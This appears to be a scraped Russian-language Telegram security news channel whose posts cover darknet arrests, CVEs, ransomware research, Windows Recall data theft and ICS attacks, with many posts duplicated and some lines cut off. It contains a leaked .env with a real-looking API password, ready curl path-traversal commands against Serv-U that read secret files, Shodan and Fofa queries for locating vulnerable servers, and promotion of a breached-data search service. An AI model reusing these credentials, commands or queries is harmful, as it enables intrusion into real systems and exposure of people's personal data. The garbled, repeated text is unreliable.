“Incognito Market” Owner Arrested for Operating One of the Largest Illegal Narcotics Marketplaces on the Internet
Недавно арестовали владельца маркетплейса Incognito Market, который служил для продажи наркотиков. Сам сервис просуществовал 4 года, а совокупный доход превысил $100 млн.
Но забавно то, как нашли его владельца, ведь вычислить его удалось почти сразу же, как Incognito Market появился на свет.
7 мая 2021 — запрос в Google:
В тот же день на форуме появляется сообщение
3 сентября 2021 —
На следующий день в публичном чейнджлоге появляется запись
Потом идут еще некоторые фичи, которые точно также трейсили по запросам и посещениям в Google, вроде внутреннего чата и Cryptopunk-аватарок на сайте.
19 июля 2022 года в
А в
Кроме того, с криптокошелька, на который поступали грязные деньги, он оплатил домен для собственного сайта-порфолио https://rs.me, на котором называет себя
Арест произошел в аэропорту Джона Кеннеди, куда Линь прилетел в качестве туриста.
Недавно арестовали владельца маркетплейса Incognito Market, который служил для продажи наркотиков. Сам сервис просуществовал 4 года, а совокупный доход превысил $100 млн.
Но забавно то, как нашли его владельца, ведь вычислить его удалось почти сразу же, как Incognito Market появился на свет.
7 мая 2021 — запрос в Google:
one pixel attack for fooling deep neural networks github. В тот же день на форуме появляется сообщение
One pixel attacks should deem the spammers/DDoSers ML efforts to fail и ссылка на гитхаб, по которой он переходил.3 сентября 2021 —
slot game terminology, с 4 по 7 сентября — он уточняет подробности и кодит. На следующий день в публичном чейнджлоге появляется запись
Integrated online casino. А спустя неделю — уже и анонс от самого админа о появлении казино на сайте.Потом идут еще некоторые фичи, которые точно также трейсили по запросам и посещениям в Google, вроде внутреннего чата и Cryptopunk-аватарок на сайте.
19 июля 2022 года в
23:30 сервер уходит в оффлайн, причина — агенты ФБР отключают и дампят его содержимое. А в
00:18, 00:19, 00:20, и 00:23 Линь (владелец маркетплейса) начинает лихорадочно стучать по клавишам и гуглить со своей учетки pm2 crashed, view pm2 daemon logs, pm2 daemon logs и pm2 changelog, — за этим процессом, как и ранее, но уже в реальном времени наблюдают сотрудники спецслужбы.Кроме того, с криптокошелька, на который поступали грязные деньги, он оплатил домен для собственного сайта-порфолио https://rs.me, на котором называет себя
Backend & Blockchain Engineer, Monero Enthusiast и постит ссылку на свой Github, с PoW-Shield — системой защиты от DDOS атак, которую он написал, и использовал на сайте Incognito Market.Арест произошел в аэропорту Джона Кеннеди, куда Линь прилетел в качестве туриста.
CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js
— встроенный вьювер в Firefox
— Node.js модуль pdfjs-dist
— сайты с предпросмотром PDF
— приложения на Electron.
И еще куча мест, где можно эксплуатировать XSS или RCE (в случае с Electron при определенных условиях), в PDF.js.
PoC: https://github.com/LOURC0D3/CVE-2024-4367-PoC
Ресерч: https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js
— встроенный вьювер в Firefox
— Node.js модуль pdfjs-dist
— сайты с предпросмотром PDF
— приложения на Electron.
И еще куча мест, где можно эксплуатировать XSS или RCE (в случае с Electron при определенных условиях), в PDF.js.
PoC: https://github.com/LOURC0D3/CVE-2024-4367-PoC
Ресерч: https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js
Karma Project
Альтернатива Глаза Бога от BadB. Можно искать по более чем 300 дампам, включая
Полностью бесплатно, без регистрации и СМС.
Они нам звонят и говорят: «У нас дохуя баз данных, нам нужно их объединять, нам нужен Data Lake». Я отвечаю: «Да вот, блять, чувак уже сделал! Нахуй вы дрочите велосипед!?»
Альтернатива Глаза Бога от BadB. Можно искать по более чем 300 дампам, включая
VKPay, Avito, Geekbrains, Сбербанк, Спортмастер, и, конечно, СДЭК.Полностью бесплатно, без регистрации и СМС.
https://github.com/SafeBreach-Labs/DoubleDrive
OneDrive как FUD Cloud Ransomware, код выложили только сейчас. Проломить учетку, слинкованную с конкретной машиной, и шифровать, жонглируя симлинками и API-запросами.
Доклад с Black Hat (преза): https://www.youtube.com/watch?v=O7y-b85HpSg
Текстовая версия: https://www.safebreach.com/blog/one-drive-double-agent-clouded-onedrive-turns-sides/
Многие шифровальщики похожи. EDR могут обнаружить их с помощью мониторинга процессов, которые изменяют много файлов, или отслеживания распространенных действий перед шифрованием, таких как удаление теневых копий.
Но что, если существует способ зашифровать все конфиденциальные данные не выполняя код на конечных устройствах?
Мы доказали, что это возможно.
OneDrive как FUD Cloud Ransomware, код выложили только сейчас. Проломить учетку, слинкованную с конкретной машиной, и шифровать, жонглируя симлинками и API-запросами.
Доклад с Black Hat (преза): https://www.youtube.com/watch?v=O7y-b85HpSg
Текстовая версия: https://www.safebreach.com/blog/one-drive-double-agent-clouded-onedrive-turns-sides/
GitHub
GitHub - SafeBreach-Labs/DoubleDrive: A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local…
A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files - SafeBreach-Labs/DoubleDrive
Пример использования анонсированной функции Recall, которая скоро появится в стабильных версиях Windows и будет включена по-умолчанию.
Все данные из менеджера паролей были распознаны с помощью OCR и теперь хранятся в локальной базе данных
В стиллеры ее кражу добавят до официального релиза
Все данные из менеджера паролей были распознаны с помощью OCR и теперь хранятся в локальной базе данных
%LocalAppData%\CoreAIPlatform.00\UKP\{<UUID>}\ukg.db.В стиллеры ее кражу добавят до официального релиза
Cybred
Пример использования анонсированной функции Recall, которая скоро появится в стабильных версиях Windows и будет включена по-умолчанию. Все данные из менеджера паролей были распознаны с помощью OCR и теперь хранятся в локальной базе данных %LocalAppData%\…
TotalRecall
Утилита для поиска, извлечения и анализа всех собранных технологией Recall-данных. На выходе отдает снимки и текст, который удалось распознать, включая историю браузера, переписки, пароли и номера кредитных карт.
Принцип работы сводится к тому, чтобы собрать файлы из
Поддерживает фильтры по дате и ключевым словам, после выполнения работы создается готовый отчет.
Утилита для поиска, извлечения и анализа всех собранных технологией Recall-данных. На выходе отдает снимки и текст, который удалось распознать, включая историю браузера, переписки, пароли и номера кредитных карт.
Принцип работы сводится к тому, чтобы собрать файлы из
ImageStore, добавить к ним расширение .jpg, и получить скриншоты. Все остальное хранится плеинтекстом в SQLite.Поддерживает фильтры по дате и ключевым словам, после выполнения работы создается готовый отчет.
This media is not supported in your browser
VIEW IN TELEGRAM
🔐 Lockpicking без отмычек, алмазных сверл и термита.
гласит надпись на сайте компании ABUS, которая производит "надежные" замки.
Производят они их из собственный сплава, Titalium, о котором никто и никогда раньше не слышал, но который подозрительно созвучен и по написанию похож на титан, Titanium.
Очевидно, сделано это, чтобы обмануть покупателя. Вопреки влажным фантазиям, стоит зайти на их лендинг и сразу становится понятно, что так они назвали обычный алюминий.
Как бы они не хвалили его прочность, капля галлия превращает навесной замок из алюминия в подобие сухой глины, — благодаря реакции двух металлов, он становится настолько хрупким, что его можно раскрошить руками.
📹 Gallium vs. Titalium - Abus Padlock Meets a Gruesome End
Хотите надежно защитить свои вещи от кражи? Не сомневайтесь! С нашими навесными замками ваши вещи останутся там, где они должны быть.
гласит надпись на сайте компании ABUS, которая производит "надежные" замки.
Производят они их из собственный сплава, Titalium, о котором никто и никогда раньше не слышал, но который подозрительно созвучен и по написанию похож на титан, Titanium.
Очевидно, сделано это, чтобы обмануть покупателя. Вопреки влажным фантазиям, стоит зайти на их лендинг и сразу становится понятно, что так они назвали обычный алюминий.
Titalium основан на легком и прочном алюминиевом сплаве. В своих замках ABUS уделяет особое внимание максимальной устойчивости и малому весу.
Как бы они не хвалили его прочность, капля галлия превращает навесной замок из алюминия в подобие сухой глины, — благодаря реакции двух металлов, он становится настолько хрупким, что его можно раскрошить руками.
📹 Gallium vs. Titalium - Abus Padlock Meets a Gruesome End
APT Profiles
Краткое саммари в красивой обложке про APT из Китая, Ирана, США, России и Северной Кореи.
На каждую из угроз — свой файл с подробным, но небольшим описанием на несколько страниц.
Можно взглянуть и сразу понять:
— какие страны они атакуют
— что у них есть в арсенале
— самые крупные инциденты
У Беларуси, как выяснилось, тоже есть собственная группировка, — UNC1151. Но здесь она определена в категорию российской, поскольку является проксей, координируемой генералами ГРУ из России.
Довольно удобно, если вы интересуетесь только скоупом этих стран, но карточек пока маловато.
Краткое саммари в красивой обложке про APT из Китая, Ирана, США, России и Северной Кореи.
На каждую из угроз — свой файл с подробным, но небольшим описанием на несколько страниц.
Можно взглянуть и сразу понять:
— какие страны они атакуют
— что у них есть в арсенале
— самые крупные инциденты
У Беларуси, как выяснилось, тоже есть собственная группировка, — UNC1151. Но здесь она определена в категорию российской, поскольку является проксей, координируемой генералами ГРУ из России.
Довольно удобно, если вы интересуетесь только скоупом этих стран, но карточек пока маловато.
Взлом провайдера или как я получил доступ к миллионам устройств
Есть такая спецификация, TR-069 или CPE WAN. С помощью нее провайдер из специальной админки может отправить клиенту любой конфиг на его роутер.
Она не является священным граалем, а доступ к ней имеют тысячи "специалистов" техподдержки для помощи клиентам.
Попасть в админку = контролировать всех клиентов провайдера, а вместе с тем и перепрошить любой роутер.
Герой статьи, Сэм Карри, однажды обнаружил, что, когда он делает curl-запрос на AWS-сервер с собственного ПК, то спустя 10 секунд на этот же сервер приходил еще один точно такой же запрос, но уже с другого IP.
И это повторялось снова и снова.
Немного раскопав глубже, выяснилось, что кто-то встал между ним и провайдером и, вероятно, реализовал сценарий, о котором я писал в начале поста.
Вооружившись Burp'ом, Сэм смог повторить полный путь злоумышленника и повторно взломал провайдера, а вместе с тем получил доступ ко всем его клиентам, включая FBI.
Есть такая спецификация, TR-069 или CPE WAN. С помощью нее провайдер из специальной админки может отправить клиенту любой конфиг на его роутер.
Она не является священным граалем, а доступ к ней имеют тысячи "специалистов" техподдержки для помощи клиентам.
Попасть в админку = контролировать всех клиентов провайдера, а вместе с тем и перепрошить любой роутер.
Герой статьи, Сэм Карри, однажды обнаружил, что, когда он делает curl-запрос на AWS-сервер с собственного ПК, то спустя 10 секунд на этот же сервер приходил еще один точно такой же запрос, но уже с другого IP.
И это повторялось снова и снова.
Немного раскопав глубже, выяснилось, что кто-то встал между ним и провайдером и, вероятно, реализовал сценарий, о котором я писал в начале поста.
Вооружившись Burp'ом, Сэм смог повторить полный путь злоумышленника и повторно взломал провайдера, а вместе с тем получил доступ ко всем его клиентам, включая FBI.
Ищем самого разыскиваемого главаря банды, награда — $2 000 000
На фото — главарь банды Kraze Baryé, которого разыскивает ФБР. Он обвиняется в убийстве нескольких полицейских и многочисленных похищениях гаитянских миссионеров.
В это сложно поверить, но сегодня он входит в топ-10 самых разыскиваемых преступников в мире. За информацию, ведущую к его поимке, правоохранители обещают вознаграждение в размере до 2 миллионов долларов.
В этой статье, с помощью Google Earth и ориентировании на местности, мы найдем место, где он скрывается вместе со своими сообщниками.
На фото — главарь банды Kraze Baryé, которого разыскивает ФБР. Он обвиняется в убийстве нескольких полицейских и многочисленных похищениях гаитянских миссионеров.
В это сложно поверить, но сегодня он входит в топ-10 самых разыскиваемых преступников в мире. За информацию, ведущую к его поимке, правоохранители обещают вознаграждение в размере до 2 миллионов долларов.
В этой статье, с помощью Google Earth и ориентировании на местности, мы найдем место, где он скрывается вместе со своими сообщниками.
This media is not supported in your browser
VIEW IN TELEGRAM
Hunt3r Kill3rs and the Italian Critical Infrastructure risks
Иранские школьники, которых называют себя Cyber Av3ngers APT, мимикрируют под россиян, и ломают израильские ПЛК Unitronics.
В своих сообщениях на ломаном русском они рассказывают о том, как отключают водоочистные сооружения и другую критическую инфраструктуру, заявляя, что "атакуют Европу и НАТО за их преступления".
Помимо того, что у Unitronics отключена аутентификация по-умолчанию, так еще и недавно исследователи из Team 82 нашли 8 уязвимостей, цепочка из которых позволяет выполнить код удаленно в обход аутентификации (на случай, если ее все-таки кто-нибудь не забудет включить).
Зачем к ним открывать доступ из интернета — загадка. Но, как показывает Shodan, таких устройств действительно много (пора закрывать и обновляться). Исследование — тут,
Иранские школьники, которых называют себя Cyber Av3ngers APT, мимикрируют под россиян, и ломают израильские ПЛК Unitronics.
В своих сообщениях на ломаном русском они рассказывают о том, как отключают водоочистные сооружения и другую критическую инфраструктуру, заявляя, что "атакуют Европу и НАТО за их преступления".
Помимо того, что у Unitronics отключена аутентификация по-умолчанию, так еще и недавно исследователи из Team 82 нашли 8 уязвимостей, цепочка из которых позволяет выполнить код удаленно в обход аутентификации (на случай, если ее все-таки кто-нибудь не забудет включить).
Зачем к ним открывать доступ из интернета — загадка. Но, как показывает Shodan, таких устройств действительно много (пора закрывать и обновляться). Исследование — тут,
Forwarded from Технологический Болт Генона
https://freetrumpknife.com/.env
За наводку спасибо @ld_anarchy
APP_NAME=Trump
APP_ENV=local
APP_DEBUG=false
APP_URL=https://freetrumpknife.com
API_USER=gunnergear.api
API_PASS=v95E*JfVEq1^aiY!
За наводку спасибо @ld_anarchy
Cybred
CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Третий критический баг за последний год в продуктах Fortra, они же разработчики Cobalt Strike. С помощью анонимного доступа в веб-админке FileCatalyst Workflow можно залить JSP-шелл в директорию…
CVE-2024-28995 PoC and Bulk Scanner
У SolarWinds попытка в безопасный корпоративный файлообменник с первого раза тоже провалилась.
Ранее я писал о критичной RCE в софте от Fortra.
Path Traversal в SolarWinds Serv-U.
SQLite с путями к файлам
Прочесть нужный
Shodan:
—
—
Fofa:
Исследование https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
У SolarWinds попытка в безопасный корпоративный файлообменник с первого раза тоже провалилась.
Ранее я писал о критичной RCE в софте от Fortra.
Path Traversal в SolarWinds Serv-U.
SQLite с путями к файлам
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\Shares^&InternalFile=Serv-U.FileShares --output Serv-U.FileShares
Прочесть нужный
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=\..\..\..\..\testdomain\7\PzhW3v7W^&InternalFile=secrets.txt
Shodan:
—
product:"Rhinosoft Serv-U httpd"—
"Serv-U FTP Server"Fofa:
app="SolarWinds-Serv-U-FTP"Исследование https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.
В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)
Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.
Присылайте заявки на доклады до 12 июля.
Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM